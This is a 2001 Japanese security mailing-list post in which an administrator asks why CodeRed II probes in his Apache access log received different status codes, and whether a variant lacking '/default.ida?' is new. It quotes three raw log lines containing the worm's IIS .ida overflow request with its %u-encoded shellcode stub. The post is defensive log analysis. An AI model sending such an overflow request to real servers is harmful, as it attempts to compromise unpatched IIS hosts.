[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[stalk:00776] CodeRed による Apache のログ
- To: security-talk@xxxxxxxxxxxxxxxxxxxx
- Subject: [stalk:00776] CodeRed による Apache のログ
- From: Seiichi Nakashima <nakasei@xxxxxxxxxxxx>
- Date: Fri, 10 Aug 2001 16:32:36 +0900
締め切り間近!〜楽天市場がおくるこの夏のビッグチャンス「友達でポン!」
┏━┳━┳━┳━┳━┳━┳━┳━┓ ■■8月10日までの大チャンス■■
┃毎┃日┃1┃0┃0┃万┃円┃!┃お友達とペアになるだけで当たっちゃう
┗━┻━┻━┻━┻━┻━┻━┻━┛ ★100万円★
今すぐ参加→ http://www.rakupita.ne.jp/
------------------------------------------------------------------------
中島です。
apacheのaccess_logの一部ですが、CodeRedIIに関するログに関して質問します。
下記3行のログで、210.xx.xxx.211と210.xxx.xxx.35から送ってきたものは、
同じようなのですが、ログは 200 - と 404 205 と異なります。
通常のログは、404 205と記録されています。
なぜ、このような差が生まれるのでしょうか?
また、210.xxx.xx.254のログは、CodeRedIIに似ていますが、先頭部分に
/default.ida?がありません。新種なのかな?
結果は 400 - なので影響はないと思っています。
210.xx.xxx.211 - - [10/Aug/2001:03:10:25 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b
%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
210.xxx.xxx.35 - - [10/Aug/2001:03:31:09 +0900] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b
%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
210.xxx.xx.254 - - [10/Aug/2001:03:36:23 +0900]
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
90%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 -
----
Seiichi Nakashima nakasei@xxxxxxxxxxxx
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
☆え?!まだ終電、間に合うの!!!
http://transfer.infoseek.co.jp/Trlast?pg=tr_last_top.html&svx=971122